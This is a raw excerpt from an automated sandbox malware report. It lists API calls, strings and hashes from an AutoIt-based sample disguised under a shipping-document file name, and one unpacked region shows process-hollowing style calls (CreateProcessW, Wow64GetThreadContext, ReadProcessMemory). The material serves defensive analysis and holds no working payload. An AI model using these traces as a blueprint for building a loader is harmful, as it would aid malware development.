                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                • String ID:
                                                                • API String ID: 1500180987-0
                                                                • Opcode ID: a39e54633bac58c6ef6235a90154d47d307604111dcbaabb9982128a56446af0
                                                                • Instruction ID: 802dfa859c708f036ac6b0337f6a2363de7f8e896c2241e003ebde27719f1ac0
                                                                • Opcode Fuzzy Hash: a39e54633bac58c6ef6235a90154d47d307604111dcbaabb9982128a56446af0
                                                                • Instruction Fuzzy Hash: 49C12DB1D00219ABDF21DF99CC85ADEB7BDEF95314F0040AAF609E6151EB309A848F65

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00934706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009F52F8,?,009337AE,?), ref: 00934724
                                                                  • Part of subcall function 0095050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00937165), ref: 0095052D
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009371A8
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0096E8C8
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0096E909
                                                                • RegCloseKey.ADVAPI32(?), ref: 0096E947
                                                                • _wcscat.LIBCMT ref: 0096E9A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$hU
                                                                • API String ID: 2673923337-2827554168
                                                                • Opcode ID: cf28ff81d0c37b0ab6bf811e07a5c3e908724235d419371dd0d3641e44a44182
                                                                • Instruction ID: d5395847070131ff6bf92a7b7101b9018e421f3f1f4470dbb9f8ed9e92c8c99b
                                                                • Opcode Fuzzy Hash: cf28ff81d0c37b0ab6bf811e07a5c3e908724235d419371dd0d3641e44a44182
                                                                • Instruction Fuzzy Hash: 67718D715183019EC314EF69EC41AABBBF8FF99350F40492EF495C72A0EB719948DB52

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00933074
                                                                • RegisterClassExW.USER32(00000030), ref: 0093309E
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009330AF
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 009330CC
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009330DC
                                                                • LoadIconW.USER32(000000A9), ref: 009330F2
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00933101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
                                                                • Opcode ID: 0d86d7e90410dfc64137b292515b2ca9bc2367b4dbe760b602597b0a33812086
                                                                • Instruction ID: b25d0110208ba40c018cb5eae3d94542b98bd55ba6f7a5de5c12e342a6109a26
                                                                • Opcode Fuzzy Hash: 0d86d7e90410dfc64137b292515b2ca9bc2367b4dbe760b602597b0a33812086
                                                                • Instruction Fuzzy Hash: EF317A71869309AFDB10CFA4EC84ADDBBF0FB08320F14416EE580E62A0D7B40540DF80

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00933A50
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00933A5F
                                                                • LoadIconW.USER32(00000063), ref: 00933A76
                                                                • LoadIconW.USER32(000000A4), ref: 00933A88
                                                                • LoadIconW.USER32(000000A2), ref: 00933A9A
                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00933AC0
                                                                • RegisterClassExW.USER32(?), ref: 00933B16
                                                                  • Part of subcall function 00933041: GetSysColorBrush.USER32(0000000F), ref: 00933074
                                                                  • Part of subcall function 00933041: RegisterClassExW.USER32(00000030), ref: 0093309E
                                                                  • Part of subcall function 00933041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009330AF
                                                                  • Part of subcall function 00933041: InitCommonControlsEx.COMCTL32(?), ref: 009330CC
                                                                  • Part of subcall function 00933041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009330DC
                                                                  • Part of subcall function 00933041: LoadIconW.USER32(000000A9), ref: 009330F2
                                                                  • Part of subcall function 00933041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00933101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                • String ID: #$0$0`$AutoIt v3
                                                                • API String ID: 423443420-1829940692
                                                                • Opcode ID: 4a1dcff8d02e3c46c1de8dc59c5a57f52418c53c25baa27b33dfa0c7e6befddf
                                                                • Instruction ID: 4c6087d215a9af03c28b10b4ff633203f5344dfd91eb244e028408512fa778e7
                                                                • Opcode Fuzzy Hash: 4a1dcff8d02e3c46c1de8dc59c5a57f52418c53c25baa27b33dfa0c7e6befddf
                                                                • Instruction Fuzzy Hash: 46216D70D28704AFEB10DFA4ED49BAD7FB4FB08721F114259E620A62B1C7B55640EF80

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00933074
                                                                • RegisterClassExW.USER32(00000030), ref: 0093309E
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009330AF
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 009330CC
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009330DC
                                                                • LoadIconW.USER32(000000A9), ref: 009330F2
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00933101
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
                                                                • Opcode ID: 0a4ff22aa1b6046ecf8387fd7e329ef7549a7cf9a9d0ffa101f28c3704ab56a4
                                                                • Instruction ID: 9ba8d95a59d70effb7106b4f0aed859750de90f109dd6ab34468cc63634835d1
                                                                • Opcode Fuzzy Hash: 0a4ff22aa1b6046ecf8387fd7e329ef7549a7cf9a9d0ffa101f28c3704ab56a4
                                                                • Instruction Fuzzy Hash: A821C9B1925718AFDB00DF94ED89BDDBBF4FB08750F11422AF610A62A0D7B14544DF91

                                                                Control-flow Graph

                                                                control_flow_graph 767 933633-933681 769 933683-933686 767->769 770 9336e1-9336e3 767->770 772 9336e7 769->772 773 933688-93368f 769->773 770->769 771 9336e5 770->771 776 9336ca-9336d2 DefWindowProcW 771->776 777 96d0cc-96d0fa call 941070 call 941093 772->777 778 9336ed-9336f0 772->778 774 933695-93369a 773->774 775 93374b-933753 PostQuitMessage 773->775 780 96d154-96d168 call 992527 774->780 781 9336a0-9336a2 774->781 782 933711-933713 775->782 783 9336d8-9336de 776->783 811 96d0ff-96d106 777->811 784 9336f2-9336f3 778->784 785 933715-93373c SetTimer RegisterWindowMessageW 778->785 780->782 804 96d16e 780->804 787 933755-93375f call 9344a0 781->787 788 9336a8-9336ad 781->788 782->783 791 96d06f-96d072 784->791 792 9336f9-93370c KillTimer call 93443a call 933114 784->792 785->782 789 93373e-933749 CreatePopupMenu 785->789 805 933764 787->805 794 9336b3-9336b8 788->794 795 96d139-96d140 788->795 789->782 798 96d074-96d076 791->798 799 96d0a8-96d0c7 MoveWindow 791->799 792->782 802 96d124-96d134 call 992d36 794->802 803 9336be-9336c4 794->803 795->776 809 96d146-96d14f call 987c36 795->809 806 96d097-96d0a3 SetFocus 798->806 807 96d078-96d07b 798->807 799->782 802->782 803->776 803->811 804->776 805->782 806->782 807->803 812 96d081-96d092 call 941070 807->812 809->776 811->776 816 96d10c-96d11f call 93443a call 93434a 811->816 812->782 816->776
                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 009336D2
                                                                • KillTimer.USER32(?,00000001), ref: 009336FC
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0093371F
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0093372A
                                                                • CreatePopupMenu.USER32 ref: 0093373E
                                                                • PostQuitMessage.USER32(00000000), ref: 0093374D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                • String ID: TaskbarCreated
                                                                • API String ID: 129472671-2362178303
                                                                • Opcode ID: bb30d7526ae413f57bd558fbddc65d99479066cc8804cfd0eb5e263a2aab7ffc
                                                                • Instruction ID: 2f29dbddfcb6de289a800763ff830fb6b6b72395fea4e41c7efced40c424d37f
                                                                • Opcode Fuzzy Hash: bb30d7526ae413f57bd558fbddc65d99479066cc8804cfd0eb5e263a2aab7ffc
                                                                • Instruction Fuzzy Hash: F7419DB2698509BFDF246F78DD4BBB93B9CEB40300F114625F702862B1CA659E40EF61

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                • API String ID: 1825951767-3513169116
                                                                • Opcode ID: c1454644c700ed5b1d68c4b3bd092f7564f11e5ad901a2b66060f0310b3c8083
                                                                • Instruction ID: 43dc300fc370207d030c4b56e10c0f95c0f1e66ea9e3196aa3e6e55254e84e90
                                                                • Opcode Fuzzy Hash: c1454644c700ed5b1d68c4b3bd092f7564f11e5ad901a2b66060f0310b3c8083
                                                                • Instruction Fuzzy Hash: C6A17B7191421DABCB14EBA4DC91BFEB7B8BF94310F414529F426A7191EF746A08CFA0

                                                                Control-flow Graph (entry block 010D8BE8-010D8C96; API calls on graph nodes: CreateFileW, VirtualAlloc ×2, ReadFile, CloseHandle, VirtualFree ×2)
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010D8CB9
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010D8EDF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateFileFreeVirtual
                                                                • String ID:
                                                                • API String ID: 204039940-0
                                                                • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                • Instruction ID: d0684a698ca5e65812d135a1bcc7a99848424c746365dba7f4db0edca6ef7803
                                                                • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                • Instruction Fuzzy Hash: 8EA10B70E00309EBDB14DFA4C894BEEBBB5BF48305F208599E655BB281D7755A40CF94

                                                                Control-flow Graph (single block 009339D5-00933A45; API calls: CreateWindowExW ×2, ShowWindow ×2)
                                                                APIs
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00933A03
                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933A24
                                                                • ShowWindow.USER32(00000000,?,?), ref: 00933A38
                                                                • ShowWindow.USER32(00000000,?,?), ref: 00933A41
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$CreateShow
                                                                • String ID: AutoIt v3$edit
                                                                • API String ID: 1584632944-3779509399
                                                                • Opcode ID: 872e66c2df0da91c3b600024873ef05271a5533e51e921d00b5f24a67ec371c5
                                                                • Instruction ID: 95543a57293e472a344007bef575e02c0b83f516e3adb6ef83b36aeda950b28a
                                                                • Opcode Fuzzy Hash: 872e66c2df0da91c3b600024873ef05271a5533e51e921d00b5f24a67ec371c5
                                                                • Instruction Fuzzy Hash: B5F03A705256907EEA306B2B6C5CEBB2E7DD7C6F60B02022ABA10A2170C6610800EAB0

                                                                Control-flow Graph (entry block 010D89C8-010D8AE8; API calls on graph nodes: CreateFileW, VirtualAlloc, ReadFile, ExitProcess)
                                                                APIs
                                                                  • Part of subcall function 010D88B8: Sleep.KERNELBASE(000001F4), ref: 010D88C9
                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010D8ADE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateFileSleep
                                                                • String ID: 8JXJJA3K61T
                                                                • API String ID: 2694422964-87512190
                                                                • Opcode ID: 90667a343e5eb24981343aa3b603085b2be27ff894635e2f1768b955a502b915
                                                                • Instruction ID: e73a918a8e913e200a7f3921e334e137572330e49e39456789d0cafbf7fe0d21
                                                                • Opcode Fuzzy Hash: 90667a343e5eb24981343aa3b603085b2be27ff894635e2f1768b955a502b915
                                                                • Instruction Fuzzy Hash: 67518D70D04349EAEB11DBA4C815BEEBB78EF19310F008199E648BB2C0D7791B49CBA5

                                                                Control-flow Graph (entry block 0093407C-00934092; API calls on graph nodes: LoadStringW, Shell_NotifyIconW)
                                                                APIs
                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0096D3D7
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • _memset.LIBCMT ref: 009340FC
                                                                • _wcscpy.LIBCMT ref: 00934150
                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00934160
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                • String ID: Line:
                                                                • API String ID: 3942752672-1585850449
                                                                • Opcode ID: ca65bb812c44d18c9930f8ce9e5f0b5578c204b774aabd9f1277cefbe3e20b9c
                                                                • Instruction ID: c8b2ed915da6f9fccf4ef292a4f167163c80a6e44a31602d3b1929185878ab0b
                                                                • Opcode Fuzzy Hash: ca65bb812c44d18c9930f8ce9e5f0b5578c204b774aabd9f1277cefbe3e20b9c
                                                                • Instruction Fuzzy Hash: DE31CF7110C705ABD335EBA0DC46FEBB7ECAF84314F114A1AF695921A1DB74A648CF82

                                                                Control-flow Graph (entry block 0093686A-00936891)
                                                                APIs
                                                                  • Part of subcall function 00934DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00934E0F
                                                                • _free.LIBCMT ref: 0096E263
                                                                • _free.LIBCMT ref: 0096E2AA
                                                                  • Part of subcall function 00936A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00936BAD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                • API String ID: 2861923089-1757145024
                                                                • Opcode ID: 817679a7723efffee73da7983eb6496914f50964b8470406fade5de8de5fd8c9
                                                                • Instruction ID: 1a0f4a92c0c721965d758d8cf92a9d2e4ab37e1637b934babb4e650924e44add
                                                                • Opcode Fuzzy Hash: 817679a7723efffee73da7983eb6496914f50964b8470406fade5de8de5fd8c9
                                                                • Instruction Fuzzy Hash: 2F916B75914219AFCF14EFA4CC92AEEB7B9FF49310F10442AF815AB2A1DB74A905CF50
                                                                APIs
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00950193
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0095019B
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009501A6
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009501B1
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009501B9
                                                                  • Part of subcall function 00950162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009501C1
                                                                  • Part of subcall function 009460F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0093F930), ref: 00946154
                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0093F9CD
                                                                • OleInitialize.OLE32(00000000), ref: 0093FA4A
                                                                • CloseHandle.KERNEL32(00000000), ref: 009745C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                • String ID: `2
                                                                • API String ID: 1986988660-1895914145
                                                                • Opcode ID: 28a193a167104445f27d62db3c390928e0061cdde12273c84c429fa12eb2b693
                                                                • Instruction ID: b4636235b1e828174b5db13e7e66057747707654fa4b2222fb1abd9d8ee9208d
                                                                • Opcode Fuzzy Hash: 28a193a167104445f27d62db3c390928e0061cdde12273c84c429fa12eb2b693
                                                                • Instruction Fuzzy Hash: 75819DB0929F40CFC394EF69A9556397BE5EB98306753812AE319CB272E7B04484EF11
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,009335A1,SwapMouseButtons,00000004,?), ref: 009335D4
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,009335A1,SwapMouseButtons,00000004,?,?,?,?,00932754), ref: 009335F5
                                                                • RegCloseKey.KERNELBASE(00000000,?,?,009335A1,SwapMouseButtons,00000004,?,?,?,?,00932754), ref: 00933617
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: Control Panel\Mouse
                                                                • API String ID: 3677997916-824357125
                                                                • Opcode ID: f6aa28d8181256e97f76c63d533020319fd34e2b0db0827f0a733dd63f9b9a3c
                                                                • Instruction ID: 69691a27970bf000d82d8fc9e6d5442232d0551f7fd6f461ea9a45c6e9a2ca95
                                                                • Opcode Fuzzy Hash: f6aa28d8181256e97f76c63d533020319fd34e2b0db0827f0a733dd63f9b9a3c
                                                                • Instruction Fuzzy Hash: 67115A71954208BFDB209F65DC42DAEB7BCEF05754F008569F805D7210D2719F40AB60
                                                                APIs
                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 010D8073
                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010D8109
                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010D812B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                • String ID:
                                                                • API String ID: 2438371351-0
                                                                APIs
                                                                  • Part of subcall function 00934EE5: _fseek.LIBCMT ref: 00934EFD
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999824
                                                                  • Part of subcall function 00999734: _wcscmp.LIBCMT ref: 00999837
                                                                • _free.LIBCMT ref: 009996A2
                                                                • _free.LIBCMT ref: 009996A9
                                                                • _free.LIBCMT ref: 00999714
                                                                  • Part of subcall function 00952D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00959A24), ref: 00952D69
                                                                  • Part of subcall function 00952D55: GetLastError.KERNEL32(00000000,?,00959A24), ref: 00952D7B
                                                                • _free.LIBCMT ref: 0099971C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                Joe Sandbox IDA Plugin
